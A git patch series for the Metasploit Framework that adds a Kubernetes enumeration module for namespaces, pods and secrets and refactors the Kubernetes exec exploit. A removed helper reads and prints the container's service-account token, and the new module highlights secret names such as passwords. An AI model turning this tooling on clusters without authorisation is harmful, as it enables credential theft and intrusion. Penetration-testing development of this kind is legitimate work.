@@ -29,9 +29,10 @@ def commands
 
   #
   # Allow modules to define their own commands
+  # Note: A change to this method will most likely require a corresponding change to respond_to_missing?
   #
   def method_missing(meth, *args)
-    if (mod and mod.respond_to?(meth.to_s, true) )
+    if mod && mod.respond_to?(meth.to_s, true)
 
       # Initialize user interaction
       mod.init_ui(driver.input, driver.output)
@@ -39,14 +40,31 @@ def method_missing(meth, *args)
       return mod.send(meth.to_s, *args)
     end
 
-    action = meth.to_s.delete_prefix('cmd_')
+    action = meth.to_s.delete_prefix('cmd_').delete_suffix('_tabs')
     if mod && mod.kind_of?(Msf::Module::HasActions) && mod.actions.map(&:name).any? { |a| a.casecmp?(action) }
+      return cmd_run_tabs(*args) if meth.end_with?('_tabs')
       return do_action(action, *args)
     end
 
     super
   end
 
+  #
+  # Note: A change to this method will most likely require a corresponding change to method_missing
+  #
+  def respond_to_missing?(meth, _include_private = true)
+    if mod && mod.respond_to?(meth.to_s, true)
+      return true
+    end
+
+    action = meth.to_s.delete_prefix('cmd_').delete_suffix('_tabs')
+    if mod && mod.kind_of?(Msf::Module::HasActions) && mod.actions.map(&:name).any? { |a| a.casecmp?(action) }
+      return true
+    end
+
+    super
+  end
+
   #
   # Execute the module with a set action
   #
diff --git a/lib/msf/ui/console/module_argument_parsing.rb b/lib/msf/ui/console/module_argument_parsing.rb
index 0ddee1dd7bb6..c192ea4a526e 100644
--- a/lib/msf/ui/console/module_argument_parsing.rb
+++ b/lib/msf/ui/console/module_argument_parsing.rb
@@ -53,7 +53,7 @@ def parse_run_opts(args, action: nil)
       end
     end
 
-    parse_opts(@@module_opts_with_action_support, args, help_cmd: help_cmd)
+    parse_opts(@@module_opts_with_action_support, args, help_cmd: help_cmd, action: action)
   end
 
   def parse_exploit_opts(args)
diff --git a/lib/msf/ui/console/table_print/age_formatter.rb b/lib/msf/ui/console/table_print/age_formatter.rb
new file mode 100644
index 000000000000..3554349c73ef
--- /dev/null
+++ b/lib/msf/ui/console/table_print/age_formatter.rb
@@ -0,0 +1,55 @@
+# -*- coding: binary -*-
+
+class Msf::Ui::Console::TablePrint::AgeFormatter
+  # Takes a string representation of a Time and attempts to parse it
+  # using a heuristic. The duration is then calculated, and returned
+  # in a human readable format, such as '13m' to represent 13 minutes ago.
+  #
+  # @param [String] date A date string, preferably in an iso8601 format
+  def format(date)
+    begin
+      duration = (Time.now - Time.parse(date))
+    rescue ArgumentError
+      return format_invalid_date(date)
+    end
+    seconds = duration
+    minutes = seconds / 60
+    hours = duration / (60 * 60)
+    days = duration / (60 * 60 * 24)
+    years = duration / (60 * 60 * 24 * 365)
+
+    if seconds < -1
+      format_invalid_date(date)
+    elsif seconds < 0
+      '0s'
+    elsif seconds < 60 * 2
+      "#{seconds.to_i}s"
+    elsif minutes < 10
+      seconds = duration.to_i % 60
+      "#{minutes.to_i}m#{seconds == 0 ? '' : "#{seconds}s"}"
+    elsif minutes < 60 * 3
+      "#{minutes.to_i}m"
+    elsif hours < 8
+      minutes = minutes.to_i % 60
+      "#{hours.to_i}h#{minutes == 0 ? '' : "#{minutes}m"}"
+    elsif hours < 24 * 2
+      "#{hours.to_i}h"
+    elsif hours < 24 * 8
+      hours = hours.to_i % 24
+      "#{days.to_i}d#{hours == 0 ? '' : "#{hours}h"}"
+    elsif hours < 24 * 365 * 2
+      "#{days.to_i}d"
+    elsif hours < 24 * 365 * 8
+      days = days % 365
+      "#{years.to_i}y#{days == 0 ? '' : "#{days.to_i}d"}"
+    else
+      "#{years.to_i}y"
+    end
+  end
+
+  protected
+
+  def format_invalid_date(_date)
+    "<invalid>"
+  end
+end
diff --git a/lib/msf/ui/console/table_print/highlight_substring_styler.rb b/lib/msf/ui/console/table_print/highlight_substring_styler.rb
index 5ca540615e70..c749939e01cb 100644
--- a/lib/msf/ui/console/table_print/highlight_substring_styler.rb
+++ b/lib/msf/ui/console/table_print/highlight_substring_styler.rb
@@ -8,15 +8,13 @@ class HighlightSubstringStyler
           HIGHLIGHT_COLOR = '%bgmag'
           RESET_COLOR = '%clr'
 
-          def initialize(substrings)
-            @substrings = substrings
+          # @param [Array<Regex|String>] terms An array of either strings or regular expressions to highlight
+          def initialize(terms)
+            @highlight_terms = /#{Regexp.union(terms.compact).source}/i
           end
 
           def style(value)
-            search_terms = @substrings.map { |substring| Regexp.escape(substring) }
-            search_pattern = /#{search_terms.join('|')}/i
-
-            value.gsub(search_pattern) { |match| "#{HIGHLIGHT_COLOR}#{match}#{RESET_COLOR}" }
+            value.gsub(@highlight_terms) { |match| "#{HIGHLIGHT_COLOR}#{match}#{RESET_COLOR}" }
           end
         end
       end
diff --git a/lib/msf_autoload.rb b/lib/msf_autoload.rb
index b5cba5f8fbcf..9afdd10966d3 100644
--- a/lib/msf_autoload.rb
+++ b/lib/msf_autoload.rb
@@ -253,6 +253,7 @@ def custom_inflections
       'vncinject_options' => 'VncInjectOptions',
       'vncinject' => 'VncInject',
       'json_hash_file' => 'JSONHashFile',
+      'jwt' => 'JWT',
       'ndr' => 'NDR',
       'ci_document' => 'CIDocument',
       'fusionvm_document' => 'FusionVMDocument',
diff --git a/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb b/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
new file mode 100644
index 000000000000..a9e737b6d2d0
--- /dev/null
+++ b/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
@@ -0,0 +1,104 @@
+# -*- coding: binary -*-
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HTTP::Kubernetes
+  include Msf::Exploit::Remote::HTTP::Kubernetes::Enumeration
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kubernetes Enumeration',
+        'Description' => %q{
+          Enumerate a Kubernetes API to report useful resources such as available namespaces,
+          pods, secrets, etc.
+
+          Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'alanfoster',
+          'Spencer McIntyre'
+        ],
+        'Notes' => {
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [],
+          'Stability' => [CRASH_SAFE]
+        },
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Actions' => [
+          ['all', { 'Description' => 'enumerate all resources' }],
+          ['version', { 'Description' => 'enumerate version' }],
+          ['auth', { 'Description' => 'enumerate auth' }],
+          ['namespace', { 'Description' => 'enumerate namespace' }],
+          ['namespaces', { 'Description' => 'enumerate namespaces' }],
+          ['pod', { 'Description' => 'enumerate pod' }],
+          ['pods', { 'Description' => 'enumerate pods' }],
+          ['secret', { 'Description' => 'enumerate secret' }],
+          ['secrets', { 'Description' => 'enumerate secrets' }],
+        ],
+        'DefaultAction' => 'all',
+        'Platform' => ['linux', 'unix'],
+        'SessionTypes' => ['meterpreter']
+      )
+    )
+
+    register_options(
+      [
+        Opt::RHOSTS(nil, false),
+        Opt::RPORT(nil, false),
+        Msf::OptInt.new('SESSION', [false, 'An optional session to use for configuration']),
+        OptRegexp.new('HIGHLIGHT_NAME_PATTERN', [true, 'PCRE regex of resource names to highlight', 'username|password|user|pass']),
+        OptString.new('NAME', [false, 'The name of the resource to enumerate', nil]),
+        OptEnum.new('OUTPUT', [true, 'output format to use', 'table', ['table', 'json']]),
+        OptString.new('NAMESPACE_LIST', [false, 'The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces', 'default,dev,staging,production,kube-node-lease,kube-lease,kube-system'])
+      ]
+    )
+  end
+
+  def output_for(type)
+    case type
+    when 'table'
+      Msf::Exploit::Remote::HTTP::Kubernetes::Output::Table.new(self, highlight_name_pattern: datastore['HIGHLIGHT_NAME_PATTERN'])
+    when 'json'
+      Msf::Exploit::Remote::HTTP::Kubernetes::Output::JSON.new(self)
+    end
+  end
+
+  def run
+    if session
+      print_status("Routing traffic through session: #{session.sid}")
+      configure_via_session
+    end
+    validate_configuration!
+
+    @kubernetes_client = Msf::Exploit::Remote::HTTP::Kubernetes::Client.new({ http_client: self, token: api_token })
+    @output = output_for(datastore['output'])
+
+    case action.name
+    when 'all'
+      enum_all
+    when 'version'
+      enum_version
+    when 'auth'
+      enum_auth(datastore['NAMESPACE'])
+    when 'namespaces', 'namespace'
+      enum_namespaces(name: datastore['NAME'])
+    when 'pods', 'pod'
+      enum_pods(datastore['NAMESPACE'], name: datastore['NAME'])
+    when 'secret', 'secrets'
+      enum_secrets(datastore['NAMESPACE'], name: datastore['NAME'])
+    end
+  rescue Msf::Exploit::Remote::HTTP::Kubernetes::Error::ApiError => e
+    print_error(e.message)
+  end
+end
diff --git a/modules/exploits/multi/kubernetes/exec.rb b/modules/exploits/multi/kubernetes/exec.rb
index cf6f58bb66cd..141d2f79fc0a 100644
--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -10,8 +10,7 @@ class MetasploitModule < Msf::Exploit
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-  include Msf::PostMixin
-  include Msf::Post::File
+  include Msf::Exploit::Remote::HTTP::Kubernetes
 
   def initialize(info = {})
     super(
@@ -38,7 +37,6 @@ def initialize(info = {})
           'Stability' => [ CRASH_SAFE ]
         },
         'DefaultOptions' => {
-          'RPORT' => 8443,
           'SSL' => true
         },
         'Targets' => [
@@ -102,97 +100,24 @@ def initialize(info = {})
         Opt::RPORT(nil, false),
         Msf::OptInt.new('SESSION', [ false, 'An optional session to use for configuration' ]),
         OptString.new('TOKEN', [ false, 'The JWT token' ]),
-        OptString.new('POD', [ true, 'The pod name to execute in' ]),
+        OptString.new('POD', [ false, 'The pod name to execute in' ]),
         OptString.new('NAMESPACE', [ false, 'The Kubernetes namespace', 'default' ]),
         OptString.new('SHELL', [true, 'The shell to use for execution', 'sh' ]),
       ]
     )
   end
 
-  def api_token
-    @api_token || datastore['TOKEN']
-  end
-
-  def rhost
-    @rhost || datastore['RHOST']
-  end
-
-  def rport
-    @rport || datastore['RPORT']
-  end
-
-  def namespace
-    @namespace || datastore['NAMESPACE']
-  end
-
   def pod_name
     @pod_name || datastore['POD']
   end
 
-  def configure_via_session
-    vprint_status("Configuring options via session #{session.sid}")
-
-    unless directory?('/run/secrets/kubernetes.io')
-      # This would imply that the target is not a Kubernetes container
-      fail_with(Failure::NotFound, 'The kubernetes.io directory was not found')
-    end
-
-    if api_token.blank?
-      token = read_file('/run/secrets/kubernetes.io/serviceaccount/token')
-      fail_with(Failure::NotFound, 'The API token was not found, manually set the TOKEN option') if token.blank?
-
-      print_good("API Token: #{token}")
-      @api_token = token
-    end
-
-    if namespace.blank?
-      ns = read_file('/run/secrets/kubernetes.io/serviceaccount/namespace')
-      fail_with(Failure::NotFound, 'The namespace was not found, manually set the NAMESPACE option') if ns.blank?
-
-      print_good("Namespace: #{ns}")
-      @namespace = ns
-    end
-
-    service_host = service_port = nil
-    if rhost.blank?
-      service_host = get_env('KUBERNETES_SERVICE_HOST')
-      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_HOST environment variable was not found, manually set the RHOSTS option') if service_host.blank?
-
-      @rhost = service_host
-    end
-
-    if rport.blank?
-      service_port = get_env('KUBERNETES_SERVICE_PORT')
-      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_PORT environment variable was not found, manually set the RPORT option') if service_port.blank?
-
-      @rport = service_port.to_i
-    end
-
-    if service_host || service_port
-      service = "#{Rex::Socket.is_ipv6?(service_host) ? '[' + service_host + ']' : service_host}:#{service_port}"
-      print_good("Kubernetes service host: #{service}")
-    end
-  end
-
-  def connect_ws(opts = {}, *args)
-    opts['comm'] = session
-    opts['vhost'] = rhost
-    super
-  end
-
-  def send_request_raw(opts = {}, *args)
-    opts['comm'] = session
-    opts['vhost'] = rhost
-    super
-  end
-
   def create_pod
     random_identifiers = Rex::RandomIdentifier::Generator.new({
       first_char_set: Rex::Text::LowerAlpha,
       char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals
     })
 
-    image_name = @kubernetes_client.list_pods(namespace).dig(:items, 0, :spec, :containers, 0, :image)
+    image_name = @kubernetes_client.list_pod(namespace).dig(:items, 0, :spec, :containers, 0, :image)
     print_status("Using image: #{image_name}")
 
     new_pod_definition = {
@@ -258,7 +183,6 @@ def exploit
     end
 
     validate_configuration!
-
     @kubernetes_client = Msf::Exploit::Remote::HTTP::Kubernetes::Client.new({ http_client: self, token: api_token })
 
     create_pod if pod_name.blank?
@@ -322,12 +246,4 @@ def execute_command(cmd, _opts = {})
     status = result&.dig(:error, 'status')
     fail_with(Failure::Unknown, "Status: #{status || 'Unknown'}") unless status == 'Success'
   end
-
-  def validate_configuration!
-    fail_with(Failure::BadConfig, 'Missing option: RHOSTS') if rhost.blank?
-    fail_with(Failure::BadConfig, 'Missing option: RPORT') if rport.blank?
-    fail_with(Failure::BadConfig, 'Invalid option: RPORT') unless rport.to_i > 0 && rport.to_i < 65536
-    fail_with(Failure::BadConfig, 'Missing option: TOKEN') if api_token.blank?
-    fail_with(Failure::BadConfig, 'Missing option: NAMESPACE') if namespace.blank?
-  end
 end
diff --git a/spec/lib/msf/exploit/remote/http/kubernetes/auth_parser_spec.rb b/spec/lib/msf/exploit/remote/http/kubernetes/auth_parser_spec.rb
new file mode 100644
index 000000000000..a77f5c1922b8
--- /dev/null
+++ b/spec/lib/msf/exploit/remote/http/kubernetes/auth_parser_spec.rb
@@ -0,0 +1,65 @@
+# -*- coding: binary -*-
+
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::Remote::HTTP::Kubernetes::AuthParser do
+  let(:valid_auth_response) do
+    {
+      "kind": "SelfSubjectRulesReview",
+      "apiVersion": "authorization.k8s.io/v1",
+      "metadata": {
+        "creationTimestamp": nil
+      },
+      "spec": {},
+      "status": {
+        "resourceRules": [
+          {
+            "verbs": [
+              "get",
+              "list"
+            ],
+            "apiGroups": [
+              "*"
+            ],
+            "resources": [
+              "pod",
+              "job"
+            ],
+            "resourceNames": [
+              "test-resource"
+            ]
+          },
+        ],
+        "nonResourceRules": [
+          {
+            "verbs": [
+              "get",
+            ],
+            "nonResourceURLs": [
+              "/apis/*",
+              "/version",
+            ]
+          }
+        ],
+        "incomplete": false
+      }
+    }.deep_symbolize_keys
+  end
+
+  let(:subject) { described_class.new(valid_auth_response) }
+
+  describe '#as_table' do
+    it 'returns the parsed list of auth rules as a table' do
+      expected = {
+        columns: ['Resources', 'Non-Resource URLs', 'Resource Names', 'Verbs'],
+        rows: [
+          ["job.*", "[]", "[test-resource]", "[get list]"],
+          ["pod.*", "[]", "[test-resource]", "[get list]"],
+          ["", "[/apis/*]", "[]", "[get]"],
+          ["", "[/version]", "[]", "[get]"]
+        ]
+      }
+      expect(subject.as_table).to eq(expected)
+    end
+  end
+end
diff --git a/spec/lib/msf/ui/console/table_print/age_formatter_spec.rb b/spec/lib/msf/ui/console/table_print/age_formatter_spec.rb
new file mode 100644
index 000000000000..040d5abb7c34
--- /dev/null
+++ b/spec/lib/msf/ui/console/table_print/age_formatter_spec.rb
@@ -0,0 +1,52 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Ui::Console::TablePrint::AgeFormatter do
+  before(:each) do
+    Timecop.freeze(Time.local(2008, 9, 5, 10, 5, 30))
+  end
+
+  after(:each) do
+    Timecop.return
+  end
+
+  describe '#format' do
+    context 'when the input is invalid' do
+      it { expect(subject.format('not-a-date')).to eq('<invalid>') }
+      it { expect(subject.format((Time.now.utc + 5.minutes).iso8601)).to eq('<invalid>') }
+    end
+
+    context 'when the input is valid' do
+      # seconds
+      it { expect(subject.format((Time.now.utc).iso8601)).to eq('0s') }
+      it { expect(subject.format((Time.now.utc - 7.seconds).iso8601)).to eq('7s') }
+      it { expect(subject.format((Time.now.utc - 119.seconds).iso8601)).to eq('119s') }
+
+      # minutes
+      it { expect(subject.format((Time.now.utc - 120.seconds).iso8601)).to eq('2m') }
+      it { expect(subject.format((Time.now.utc - 121.seconds).iso8601)).to eq('2m1s') }
+      it { expect(subject.format((Time.now.utc - 5.minutes).iso8601)).to eq('5m') }
+      it { expect(subject.format((Time.now.utc - 179.minutes).iso8601)).to eq('179m') }
+      it { expect(subject.format((Time.now.utc - 179.minutes - 5.seconds).iso8601)).to eq('179m') }
+
+      # hours
+      it { expect(subject.format((Time.now.utc - 180.minutes).iso8601)).to eq('3h') }
+      it { expect(subject.format((Time.now.utc - 185.minutes).iso8601)).to eq('3h5m') }
+      it { expect(subject.format((Time.now.utc - 7.hours - 5.minutes).iso8601)).to eq('7h5m') }
+      it { expect(subject.format((Time.now.utc - 8.hours).iso8601)).to eq('8h') }
+      it { expect(subject.format((Time.now.utc - 8.hours - 5.minutes).iso8601)).to eq('8h') }
+      it { expect(subject.format((Time.now.utc - 30.hours).iso8601)).to eq('30h') }
+
+      # days
+      it { expect(subject.format((Time.now.utc - 4.days).iso8601)).to eq('4d') }
+      it { expect(subject.format((Time.now.utc - 4.days - 5.hours).iso8601)).to eq('4d5h') }
+      it { expect(subject.format((Time.now.utc - 200.days).iso8601)).to eq('200d') }
+      it { expect(subject.format((Time.now.utc - 200.days - 5.hours).iso8601)).to eq('200d') }
+      it { expect(subject.format((Time.now.utc - 364.days - 5.hours).iso8601)).to eq('364d') }
+      it { expect(subject.format((Time.now.utc - 364.days - 5.hours).iso8601)).to eq('364d') }
+      it { expect(subject.format((Time.now.utc - 400.days).iso8601)).to eq('400d') }
+
+      # years
+      it { expect(subject.format((Time.now.utc - 10.years).iso8601)).to eq('10y') }
+    end
+  end
+end
diff --git a/spec/lib/msf/ui/console/table_print/highlight_substring_styler_spec.rb b/spec/lib/msf/ui/console/table_print/highlight_substring_styler_spec.rb
index 12cb15ecdbf0..4363d26f3281 100644
--- a/spec/lib/msf/ui/console/table_print/highlight_substring_styler_spec.rb
+++ b/spec/lib/msf/ui/console/table_print/highlight_substring_styler_spec.rb
@@ -30,5 +30,12 @@
 
       expect(styler.style(str)).to eql "%bgmagA%clr%bgmagB%clr%bgmagC%clr%bgmagA%clr%bgmagB%clr%bgmagC%clr"
     end
+
+    it 'should support regex highlight terms' do
+      str = 'username password compassionate PASSWORD foo bar'
+      styler = described_class.new([/user|pass/, 'foo'])
+
+      expect(styler.style(str)).to eql "%bgmaguser%clrname %bgmagpass%clrword com%bgmagpass%clrionate PASSWORD %bgmagfoo%clr bar"
+    end
   end
 end
diff --git a/spec/msf/ui/console/module_argument_parsing_spec.rb b/spec/msf/ui/console/module_argument_parsing_spec.rb
index 6d73148eb8fa..70724e634b43 100644
--- a/spec/msf/ui/console/module_argument_parsing_spec.rb
+++ b/spec/msf/ui/console/module_argument_parsing_spec.rb
@@ -272,6 +272,40 @@ def cmd_exploit_help
     it_behaves_like 'a command which shows help menus',
                     method_name: 'parse_run_opts',
                     expected_help_cmd: 'cmd_run_help'
+
+    it 'handles an action being supplied' do
+      args = []
+      expected_result = {
+        jobify: false,
+        quiet: false,
+        action: 'action-name',
+        datastore_options: {}
+      }
+      expect(subject.parse_run_opts(args, action: 'action-name')).to eq(expected_result)
+    end
+
+    it 'handles an action being specified from the original datastore value' do
+      current_mod.datastore['action'] = 'datastore-action-name'
+      args = []
+      expected_result = {
+        jobify: false,
+        quiet: false,
+        action: 'action-name',
+        datastore_options: {}
+      }
+      expect(subject.parse_run_opts(args, action: 'action-name')).to eq(expected_result)
+    end
+
+    it 'handles an action being nil' do
+      args = []
+      expected_result = {
+        jobify: false,
+        quiet: false,
+        action: nil,
+        datastore_options: {}
+      }
+      expect(subject.parse_run_opts(args)).to eq(expected_result)
+    end
   end
 
   describe '#parse_exploit_opts' do
diff --git a/spec/support/shared/contexts/msf/ui_driver.rb b/spec/support/shared/contexts/msf/ui_driver.rb
index 8c12bffd4246..d6ef32e4366b 100644
--- a/spec/support/shared/contexts/msf/ui_driver.rb
+++ b/spec/support/shared/contexts/msf/ui_driver.rb
@@ -21,14 +21,14 @@
   end
 
   def capture_logging(target)
-    append_output = proc do |string|
+    append_output = proc do |string = ''|
       lines = string.split("\n")
       @output ||= []
       @output.concat(lines)
       @combined_output ||= []
       @combined_output.concat(lines)
     end
-    append_error = proc do |string|
+    append_error = proc do |string = ''|
       lines = string.split("\n")
       @error ||= []
       @error.concat(lines)
@@ -36,11 +36,13 @@ def capture_logging(target)
       @combined_output.concat(lines)
     end
 
-    allow(target).to receive(:print).with(kind_of(String), &append_output)
-    allow(target).to receive(:print_line).with(kind_of(String), &append_output)
-    allow(target).to receive(:print_status).with(kind_of(String), &append_output)
-    allow(target).to receive(:print_warning).with(kind_of(String), &append_error)
-    allow(target).to receive(:print_error).with(kind_of(String), &append_error)
-    allow(target).to receive(:print_bad).with(kind_of(String), &append_error)
+    allow(target).to receive(:print, &append_output)
+    allow(target).to receive(:print_line, &append_output)
+    allow(target).to receive(:print_status, &append_output)
+    allow(target).to receive(:print_good, &append_output)
+
+    allow(target).to receive(:print_warning, &append_error)
+    allow(target).to receive(:print_error, &append_error)
+    allow(target).to receive(:print_bad, &append_error)
   end
 end

From 3a8495cf870ae8ca6980cdf1214d4084361b1fba Mon Sep 17 00:00:00 2001
From: adfoster-r7 <alandavid_foster@rapid7.com>
Date: Thu, 7 Oct 2021 12:35:53 +0100
Subject: [PATCH 2/4] PR feedback

---
 lib/msf/core/exploit/remote/http/jwt.rb       | 18 ++++++++++-----
 .../remote/http/kubernetes/auth_parser.rb     |  5 +----
 .../exploit/remote/http/kubernetes/client.rb  | 10 ++++-----
 .../remote/http/kubernetes/enumeration.rb     | 22 ++++++++++++++-----
 .../exploit/remote/http/kubernetes/error.rb   |  9 ++++++++
 .../remote/http/kubernetes/output/table.rb    | 14 +++++++++++-
 .../cloud/kubernetes/enum_kubernetes.rb       |  3 +--
 7 files changed, 58 insertions(+), 23 deletions(-)

diff --git a/lib/msf/core/exploit/remote/http/jwt.rb b/lib/msf/core/exploit/remote/http/jwt.rb
index 6d6867d87e85..696272471faa 100644
--- a/lib/msf/core/exploit/remote/http/jwt.rb
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -4,20 +4,26 @@
 # Note that swapping this out for a third-party gem will work, but
 # there may be potential security issues with the key id (kid) claim etc,
 # which would need to be reviewed.
-module Msf::Exploit::Remote::HTTP::JWT
-  module_function
+class Msf::Exploit::Remote::HTTP::JWT
+  attr_reader :payload, :header, :signature
 
-  def encode(payload, key, algorithm = 'HS256', header_fields = {})
+  def initialize(payload:, header:, signature:)
+    @payload = payload
+    @header = header
+    @signature = signature
+  end
+
+  def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
     raise NotImplementedError
   end
 
-  def decode(jwt, _key = nil, _verify = true, _options = {})
+  def self.decode(jwt, _key = nil, _verify = true, _options = {})
     header, payload, signature = jwt.split('.', 3)
-    raise ArgumentError, "Invalid JWT format" if header.nil? || payload.nil? || signature.nil?
+    raise ArgumentError, 'Invalid JWT format' if header.nil? || payload.nil? || signature.nil?
 
     header = JSON.parse(Rex::Text.decode_base64(header))
     payload = JSON.parse(Rex::Text.decode_base64(payload))
 
-    [payload, header]
+    self.new(payload: payload, header: header, signature: signature)
   end
 end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb b/lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb
index 741f92612082..510415ae42bd 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb
@@ -98,7 +98,6 @@ def find_policy(existing_simple_rules, simple_rule)
       is_match = (
         existing_simple_rule[:group] == simple_rule[:group] &&
           existing_simple_rule[:resource] == simple_rule[:resource] &&
-          existing_simple_rule[:resourceNameExist] == simple_rule[:resourceNameExist] &&
           existing_simple_rule[:resourceName] == simple_rule[:resourceName]
       )
 
@@ -146,14 +145,12 @@ def as_simple_rule(policy_rule)
 
     simple_rule = {
       group: policy_rule[:apiGroups][0],
-      resource: policy_rule[:resources][0],
-      resourceNameExist: false
+      resource: policy_rule[:resources][0]
     }
 
     if policy_rule[:resourceNames].any?
       simple_rule.merge(
         {
-          resourceNameExist: true,
           resourceName: policy_rule[:resourceNames][0]
         }
       )
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/client.rb b/lib/msf/core/exploit/remote/http/kubernetes/client.rb
index 9133ae47775b..800b25a892ef 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/client.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/client.rb
@@ -174,7 +174,7 @@ def get_secret(secret, namespace, options = {})
               json
             end
 
-            def list_secret(namespace, options = {})
+            def list_secrets(namespace, options = {})
               _res, json = call_api(
                 {
                   'method' => 'GET',
@@ -198,7 +198,7 @@ def get_namespace(namespace, options = {})
               json
             end
 
-            def list_namespace(options = {})
+            def list_namespaces(options = {})
               _res, json = call_api(
                 {
                   'method' => 'GET',
@@ -210,7 +210,7 @@ def list_namespace(options = {})
               json
             end
 
-            def list_pod(namespace, options = {})
+            def list_pods(namespace, options = {})
               _res, json = call_api(
                 {
                   'method' => 'GET',
@@ -266,7 +266,7 @@ def call_api(request, options = {})
               res = http_client.send_request_raw(request_options(request, options))
 
               if res.nil? || res.body.nil?
-                raise Kubernetes::Error::ApiError.new(res: res)
+                raise Kubernetes::Error::InvalidApiError.new(res: res)
               elsif res.code == 401
                 raise Kubernetes::Error::AuthenticationError.new(res: res)
               elsif res.code == 403
@@ -277,7 +277,7 @@ def call_api(request, options = {})
 
               json = res.get_json_document
               if json.nil?
-                raise Kubernetes::Error::ApiError.new(res: res)
+                raise Kubernetes::Error::InvalidApiError.new(res: res)
               end
 
               [res, json.deep_symbolize_keys]
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
index 9f697e8cf68a..a9ba8eafc09d 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
@@ -2,6 +2,16 @@
 
 # The mixin for enumerating a Msf::Exploit::Remote::HTTP::Kubernetes API
 module Msf::Exploit::Remote::HTTP::Kubernetes::Enumeration
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        Msf::OptString.new('NAMESPACE_LIST', [false, 'The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces', 'default,dev,staging,production,kube-node-lease,kube-lease,kube-system'])
+      ]
+    )
+  end
+
   def enum_all
     enum_version
     namespace_items = enum_namespaces
@@ -31,10 +41,12 @@ def enum_all
   end
 
   def enum_version
+    version = nil
     attempt_enum(:version) do
       version = kubernetes_client.get_version
       output.print_version(version)
     end
+    version
   end
 
   def enum_namespaces(name: nil)
@@ -45,7 +57,7 @@ def enum_namespaces(name: nil)
       if name
         namespace_items = [kubernetes_client.get_namespace(name)]
       else
-        namespace_items = kubernetes_client.list_namespace.fetch(:items, [])
+        namespace_items = kubernetes_client.list_namespaces.fetch(:items, [])
       end
     end
     output.print_namespaces(namespace_items)
@@ -64,7 +76,7 @@ def enum_pods(namespace, name: nil)
       if name
         pods = [kubernetes_client.get_pod(name, namespace)]
       else
-        pods = kubernetes_client.list_pod(namespace).fetch(:items, [])
+        pods = kubernetes_client.list_pods(namespace).fetch(:items, [])
       end
 
       output.print_pods(namespace, pods)
@@ -76,7 +88,7 @@ def enum_secrets(namespace, name: nil)
       if name
         secrets = [kubernetes_client.get_secret(name, namespace)]
       else
-        secrets = kubernetes_client.list_secret(namespace).fetch(:items, [])
+        secrets = kubernetes_client.list_secrets(namespace).fetch(:items, [])
       end
 
       output.print_secrets(namespace, secrets)
@@ -206,8 +218,8 @@ def parse_private_key(data)
   end
 
   def parse_jwt(token)
-    claims, _header = Msf::Exploit::Remote::HTTP::JWT.decode(token)
-    claims
+    parsed_token = Msf::Exploit::Remote::HTTP::JWT.decode(token)
+    parsed_token.payload
   rescue ArgumentError
     nil
   end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/error.rb b/lib/msf/core/exploit/remote/http/kubernetes/error.rb
index 80bd1bba59ea..48d9657802f0 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/error.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/error.rb
@@ -15,6 +15,15 @@ def initialize(message: nil, res: nil)
               attr_reader :res
             end
 
+            class InvalidApiError < ApiError
+              def initialize(message: nil, res: nil)
+                super(message: message || "Kubernetes InvalidApi - target does not appear to be running Kubernetes, verify configuration", res: res)
+                @res = res
+              end
+
+              attr_reader :res
+            end
+
             class AuthenticationError < ApiError
               def initialize(message: nil, res: nil)
                 super(message: message || "Kubernetes AuthenticationError - token may be invalid", res: res)
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb b/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
index 4749245987cb..8e37db544f0d 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
@@ -33,7 +33,19 @@ def print_enum_failure(resource, error)
   end
 
   def print_version(version)
-    print_good("Kubernetes service version: #{version.to_json}")
+    table = create_table(
+      'Header' => 'Version',
+      'Columns' => ['name', 'value']
+    )
+
+    version.each_pair do |key, value|
+      table << [
+        key,
+        value
+      ]
+    end
+
+    print_table(table)
   end
 
   def print_namespaces(namespaces)
diff --git a/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb b/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
index a9e737b6d2d0..5c98a1da872d 100644
